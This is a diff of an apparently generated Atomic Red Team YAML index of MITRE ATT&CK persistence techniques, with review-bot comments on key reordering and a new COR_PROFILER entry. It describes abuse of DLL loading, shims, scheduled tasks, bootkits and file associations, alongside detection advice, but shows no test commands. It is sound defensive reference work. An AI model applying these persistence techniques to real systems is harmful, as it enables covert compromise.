Monitor Azure Activity Logs for service principal modifications.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Azure activity logs
+ x_mitre_platforms:
+ - Azure AD
+ - Azure
atomic_tests: []
T1546.009:
technique:
@@ -8389,13 +8518,14 @@ persistence:
phase_name: persistence
modified: '2020-03-24T20:22:45.298Z'
created: '2020-01-24T14:47:41.795Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor DLL loads by processes, specifically looking for
DLLs that are not recognized or not normally loaded into a process. Monitor
the AppCertDLLs Registry value for modifications that do not correlate with
@@ -8409,14 +8539,13 @@ persistence:
but as part of a chain of behavior that could lead to other activities, such
as making network connections for Command and Control, learning details about
the environment through Discovery, and conducting Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.010:
technique:
@@ -8468,13 +8597,15 @@ persistence:
phase_name: persistence
modified: '2020-03-24T20:34:09.996Z'
created: '2020-01-24T14:52:25.589Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Secure boot disabled on systems running Windows 8 and later
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and
look for DLLs that are not recognized or not normally loaded into a process.
Monitor the AppInit_DLLs Registry values for modifications that do not correlate
@@ -8489,15 +8620,13 @@ persistence:
lead to other activities, such as making network connections for Command and
Control, learning details about the environment through Discovery, and conducting
Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_system_requirements:
- - Secure boot disabled on systems running Windows 8 and later
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -8561,6 +8690,10 @@ persistence:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Endgame Process Injection July 2017
+ - source_name: FireEye Application Shimming
+ url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
+ description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved
+ May 4, 2020.
- url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
@@ -8593,9 +8726,9 @@ persistence:
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
may allow an adversary to perform several malicious acts such as elevate privileges,
- install backdoors, disable defenses like Windows Defender, etc. Shims can
- also be abused to establish persistence by continuously being invoked by affected
- programs."
+ install backdoors, disable defenses like Windows Defender, etc. (Citation:
+ FireEye Application Shimming) Shims can also be abused to establish persistence
+ by continuously being invoked by affected programs."
id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83
type: attack-pattern
kill_chain_phases:
@@ -8603,14 +8736,12 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:28:29.648Z'
+ modified: '2020-05-04T19:05:30.140Z'
created: '2020-01-24T14:56:24.231Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
@@ -8621,10 +8752,12 @@ persistence:
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Windows
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -8731,11 +8864,9 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-23T22:35:13.112Z'
created: '2019-12-03T12:59:36.749Z'
- x_mitre_platforms:
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
x_mitre_detection: "Monitor scheduled task creation using command-line invocation.
Legitimate scheduled tasks may be created during installation of new software
or through system administration functions. Look for changes to tasks that
@@ -8746,9 +8877,11 @@ persistence:
could lead to other activities, such as network connections made for Command
and Control, learning details about the environment through Discovery, and
Lateral Movement."
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1053.002:
technique:
@@ -8803,8 +8936,16 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T13:43:40.776Z'
created: '2019-11-27T13:52:45.853Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -8820,16 +8961,8 @@ persistence:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -8882,22 +9015,22 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T15:11:25.821Z'
created: '2020-01-24T14:54:42.757Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned DLLs try to load into the LSA by setting
the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1197:
technique:
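Review bot: The `x_mitre_*` keys are reordered in opposite directions across entries in this regeneration — T1546.003 at the top of this diff moves `x_mitre_version` to the first position, while T1547.008 here (and T1197, T1037 below) move it to the last — which indicates the generator emits keys in whatever order the STIX source happens to have, not a stable order. That turns a handful of real content changes (new platforms, citations, `modified` timestamps) into hundreds of lines of churn that a reviewer has to read past, and it makes the file's own ordering inconsistent from one technique to the next. If the YAML is produced with PyYAML, `yaml.dump(data, sort_keys=True)` (or an explicit key order in the generator) would make future regenerations diff only on substance; the generator itself is not in this diff, so this is a presumption about how the file is built.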
@@ -8957,31 +9090,31 @@ persistence:
phase_name: persistence
modified: '2020-03-25T23:28:10.049Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Ricardo Dias
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Packet capture
- - Windows event logs
- x_mitre_defense_bypassed:
- - Firewall
- - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host forensic analysis
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Packet capture
+ - Windows event logs
+ x_mitre_contributors:
+ - Ricardo Dias
+ - Red Canary
+ x_mitre_version: '1.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -9116,12 +9249,14 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T19:47:43.546Z'
+ modified: '2020-06-30T21:23:15.683Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -9140,12 +9275,10 @@ persistence:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037:
technique:
@@ -9179,19 +9312,19 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.953Z'
created: '2017-05-31T21:30:38.910Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1542.003:
technique:
@@ -9199,10 +9332,10 @@ persistence:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
- - url: https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf
- description: Mandiant. (2016, February). M-Trends 2016. Retrieved January
- 4, 2017.
- source_name: MTrends 2016
+ - source_name: Mandiant M Trends 2016
+ url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
+ description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
+ March 5, 2019.
- url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion?
(Infographic). Retrieved November 13, 2014.
@@ -9214,7 +9347,7 @@ persistence:
description: |-
Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
- A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
+ A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
@@ -9224,27 +9357,27 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:43:32.353Z'
+ modified: '2020-05-07T22:32:05.335Z'
created: '2019-12-19T21:05:38.123Z'
- x_mitre_platforms:
- - Linux
- - Windows
- x_mitre_data_sources:
- - VBR
- - MBR
- - API monitoring
- x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
- of MBR and VBR and compare against known good samples. Report changes to MBR
- and VBR as they occur for indicators of suspicious activity and further analysis.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
+ of MBR and VBR and compare against known good samples. Report changes to MBR
+ and VBR as they occur for indicators of suspicious activity and further analysis.
+ x_mitre_data_sources:
+ - VBR
+ - MBR
+ - API monitoring
+ x_mitre_platforms:
+ - Linux
+ - Windows
atomic_tests: []
T1176:
technique:
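Review bot: Every changed line in this hunk is a reorder of the same `x_mitre_*` keys of the bootkit technique with identical values, and the same pattern repeats in the T1176, T1078.004, T1542.002, T1546.015, T1136, T1543, T1053.003 and T1574.001 hunks below. Key order in the source STIX bundle is not significant, so if this index is generated, writing each technique mapping with a fixed key order (or sorting keys at dump time) would stop upstream re-serialization from churning the whole file; that is presumably a generator change rather than a change to this file. As it stands, the substantive changes — the new T1574.012 entry, and under T1546.015 the `modified` bump together with the contributor change from `- ENDGAME` to `- Elastic` — are easy to miss among the reordering.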
@@ -9306,26 +9439,26 @@ persistence:
phase_name: persistence
modified: '2020-03-25T23:36:30.565Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Justin Warner, ICEBRG
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
+
+ Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
x_mitre_data_sources:
- Windows Registry
- File monitoring
- Process use of network
- Process monitoring
- Browser extensions
- x_mitre_detection: |-
- Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
-
- Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Justin Warner, ICEBRG
+ x_mitre_version: '1.1'
identifier: T1176
atomic_tests:
- name: Chrome (Developer Mode)
@@ -9394,8 +9527,121 @@ persistence:
2. Click 'Get'
name: manual
+ T1574.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.012
+ url: https://attack.mitre.org/techniques/T1574/012
+ - source_name: Microsoft Profiling Mar 2017
+ url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
+ description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
+ 24, 2020.
+ - source_name: Microsoft COR_PROFILER Feb 2013
+ url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
+ description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
+ and Attach. Retrieved June 24, 2020.
+ - source_name: RedCanary Mockingbird May 2020
+ url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
+ description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
+ May 26, 2020.
+ - source_name: Red Canary COR_PROFILER May 2020
+ url: https://redcanary.com/blog/cor_profiler-for-persistence/
+ description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
+ for persistence. Retrieved June 24, 2020.
+ - source_name: Almond COR_PROFILER Apr 2019
+ url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
+ description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
+ Retrieved June 24, 2020.
+ - source_name: GitHub OmerYa Invisi-Shell
+ url: https://github.com/OmerYa/Invisi-Shell
+ description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
+ 2020.
+ - source_name: subTee .NET Profilers May 2017
+ url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
+ description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
+ Profilers. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: COR_PROFILER
+ description: |-
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-26T16:09:58.920Z'
+ created: '2020-06-24T22:30:55.843Z'
+ x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER,
+ monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and
+ COR_PROFILER_PATH that correspond to system and user environment variables
+ that do not correlate to known developer tools. Extra scrutiny should be placed
+ on suspicious modification of these Registry keys by command line tools like
+ wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring
+ for command-line arguments indicating a change to COR_PROFILER variables may
+ aid in detection. For system, user, and process scope abuse of the COR_PROFILER,
+ monitor for new suspicious unmanaged profiling DLLs loading into .NET processes
+ shortly after the CLR causing abnormal process behavior.(Citation: Red Canary
+ COR_PROFILER May 2020) Consider monitoring for DLL files that are associated
+ with COR_PROFILER environment variables.'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_contributors:
+ - Jesse Brown, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1546.001:
technique:
+ created: '2020-01-24T13:40:47.282Z'
+ modified: '2020-01-24T13:40:47.282Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
+ description: "Adversaries may establish persistence by executing malicious content
+ triggered by a file type association. When a file is opened, the default program
+ used to open the file (also called the file association or handler) is checked.
+ File association selections are stored in the Windows Registry and can be
+ edited by users, administrators, or programs that have Registry access (Citation:
+ Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
+ by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
+ Oct 2017) Applications can modify the file association for a given file extension
+ to call an arbitrary program when a file with the given extension is opened.\n\nSystem
+ file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
+ for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
+ for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
+ various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
+ For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
+ HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
+ values of the keys listed are commands that are executed when the handler
+ opens the file extension. Adversaries can modify these values to continually
+ execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
+ name: Change Default File Association
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1546.001
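Review bot: The new T1574.012 (COR_PROFILER) entry is added with `atomic_tests: []`, while an atomic named `COM Hijack Leveraging user scope COR_PROFILER` already exists under T1546.015 later in this file; if that test primarily exercises the COR_PROFILER environment variable rather than a COM object registration, it may belong under, or at least deserve a cross-reference from, T1574.012 — worth confirming against the atomic's own YAML source, since this index looks generated. Separately, the description carries the upstream misspelling `profiliers` (for `profilers`); it is inherited from the ATT&CK data and can only be corrected there, not in this generated file.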
@@ -9419,37 +9665,6 @@ persistence:
description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August
8, 2018.
source_name: TrendMicro TROJ-FAKEAV OCT 2012
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Change Default File Association
- description: "Adversaries may establish persistence by executing malicious content
- triggered by a file type association. When a file is opened, the default program
- used to open the file (also called the file association or handler) is checked.
- File association selections are stored in the Windows Registry and can be
- edited by users, administrators, or programs that have Registry access (Citation:
- Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
- by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
- Oct 2017) Applications can modify the file association for a given file extension
- to call an arbitrary program when a file with the given extension is opened.\n\nSystem
- file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
- for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
- for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
- various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
- For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
- HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
- values of the keys listed are commands that are executed when the handler
- opens the file extension. Adversaries can modify these values to continually
- execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
- id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-01-24T13:40:47.282Z'
- created: '2020-01-24T13:40:47.282Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -9537,28 +9752,28 @@ persistence:
phase_name: persistence
modified: '2020-03-24T12:44:27.995Z'
created: '2020-01-29T17:32:30.711Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: Collect usage logs from cloud user and administrator accounts
+ to identify unusual activity in the creation of new accounts and assignment
+ of roles to those accounts. Monitor for accounts assigned to admin roles that
+ go over a certain threshold of known admins.
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_contributors:
+ - Praetorian
+ - Microsoft Threat Intelligence Center (MSTIC)
x_mitre_platforms:
- AWS
- GCP
- Azure
- Office 365
- Azure AD
- x_mitre_contributors:
- - Praetorian
- - Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Office 365 audit logs
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
- x_mitre_detection: Collect usage logs from cloud user and administrator accounts
- to identify unusual activity in the creation of new accounts and assignment
- of roles to those accounts. Monitor for accounts assigned to admin roles that
- go over a certain threshold of known admins.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1078.004:
technique:
@@ -9599,6 +9814,19 @@ persistence:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -9606,19 +9834,6 @@ persistence:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1542.002:
technique:
@@ -9654,27 +9869,27 @@ persistence:
phase_name: defense-evasion
modified: '2020-03-23T23:48:33.904Z'
created: '2019-12-19T20:21:21.669Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
